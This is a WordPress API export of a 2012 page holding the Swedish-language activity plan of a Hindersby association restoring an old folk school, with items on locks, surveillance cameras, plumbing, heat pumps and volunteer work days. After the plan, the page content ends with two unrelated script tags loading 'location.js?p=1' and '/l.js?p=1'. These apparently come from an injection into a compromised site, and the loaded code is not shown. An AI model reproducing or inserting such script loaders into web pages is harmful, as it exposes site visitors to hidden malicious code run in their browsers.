{"id":1009,"date":"2012-03-13T13:01:45","date_gmt":"2012-03-13T11:01:45","guid":{"rendered":"http:\/\/84.20.155.7\/nywp\/?page_id=1009"},"modified":"2012-03-13T13:01:45","modified_gmt":"2012-03-13T11:01:45","slug":"gfv-verksamhetsplan-2012","status":"publish","type":"page","link":"https:\/\/hindersby.net\/word2021\/gamla-folkskolans-vanner-gfv\/gfv-arsmote-2012\/gfv-verksamhetsplan-2012\/","title":{"rendered":"GFV Verksamhetsplan 2012"},"content":{"rendered":"<div>\n<p>Gamla folkskolans v\u00e4nner i Hindersby r.f<\/p>\n<p>Verksamhetsplan 2012<\/p>\n<p>1. F\u00f6reningens f\u00f6rsta m\u00f6te 18 mars<br \/>\n2. Uthusets d\u00f6rrar skall f\u00f6rses med l\u00e5s och f\u00f6nstren med starka luckor.<br \/>\n3. Kamera\u00f6vervakning installeras i och omkring huset.<br \/>\n4. VVS-planering f\u00f6r v\u00e4rme och vatten( fryss\u00e4ker)<br \/>\n5. Elplanering f\u00f6r sammalslagning av de tv\u00e5 elavtalen ( billigare)<br \/>\n6. Anskaffning av v\u00e4rmepumpar<br \/>\n7. Gallring av tr\u00e4den bakom huset( f\u00f6rr\u00e4n v\u00e4rmepumparnas uteenheter \u00a0\u00a0\u00a0\u00a0\u00a0installeras)<br \/>\n8. \u00d6ppning av \u00a0d\u00f6rr mellan l\u00e4rarbostadens sal och arbetsrum (finns \u00a0d\u00f6rrskivan kvar?)<br \/>\n9. Byte av l\u00e5s p\u00e5 ytterd\u00f6rrarna.<br \/>\n10. Sittplatser (b\u00e4nkar )f\u00f6r 30-100 personer<br \/>\n11. Inflyttningsfest( i maj)<br \/>\n12. Eventuell \u00f6ppen dag n\u00e5gon dag i veckan.<br \/>\n13.Vattenanslutning kopplas in till huset.<br \/>\n14.V\u00e4rmesystemet \u00a0t\u00f6ms men radiatorerna blir kvar tillsvidare.<br \/>\n15.Vattenr\u00f6ren f\u00f6rnyas helt: plastr\u00f6r med skyddsr\u00f6r som mynnar ut \u00a0\u00a0under huset<br \/>\n16. Varmvattnet byggs om( varmvattenberedare) och duchrummet rivs( blir arbetsrum)<br \/>\n17. Byggnadsv\u00e5rdkurs( b\u00f6rjar i maj?)<br \/>\n18. V\u00e5rst\u00e4dningstalko<br \/>\n19. V\u00e4g till rinken byggs mellan gamla skolan och uthuset.<br \/>\n20. D\u00f6rrar bak\u00e5t p\u00e5 uthus (pappersinsamlingen)<br \/>\n21. St\u00e4ngsel s\u00e4tts eventuellt upp mot skolg\u00e5rden.<br \/>\n22. Plantering av cembratall ist\u00e4llet f\u00f6r de gamla( plantor finns i skogen)<br \/>\n23. Kl\u00e4tterst\u00e4llningar bort (olagliga)<br \/>\n24. F\u00f6nstert\u00e4tning f\u00f6re vintern<br \/>\n25. Hyllputsning och planering<br \/>\n26. T\u00f6mning av sl\u00f6jdsal<br \/>\n27. H\u00f6stst\u00e4dningstalko<br \/>\n28. Vinteromst\u00e4llning<br \/>\n29. \u00d6vrigt som kommer upp p\u00e5 m\u00f6tet \u00a0ang\u00e5ende verksamheten.<\/p>\n<\/div>\n<p><script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Gamla folkskolans v\u00e4nner i Hindersby r.f Verksamhetsplan 2012 1. F\u00f6reningens f\u00f6rsta m\u00f6te 18 mars 2. Uthusets d\u00f6rrar skall f\u00f6rses med l\u00e5s och f\u00f6nstren med starka luckor. 3. Kamera\u00f6vervakning installeras i och omkring huset. 4. VVS-planering f\u00f6r v\u00e4rme och vatten( fryss\u00e4ker) 5. Elplanering f\u00f6r sammalslagning av de tv\u00e5 elavtalen ( billigare) 6. Anskaffning av v\u00e4rmepumpar 7. &hellip; <a href=\"https:\/\/hindersby.net\/word2021\/gamla-folkskolans-vanner-gfv\/gfv-arsmote-2012\/gfv-verksamhetsplan-2012\/\" class=\"more-link\">Forts\u00e4tt l\u00e4sa<span class=\"screen-reader-text\"> \u201dGFV Verksamhetsplan 2012\u201d<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":1004,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-1009","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/1009","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/comments?post=1009"}],"version-history":[{"count":0,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/1009\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/1004"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/media?parent=1009"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}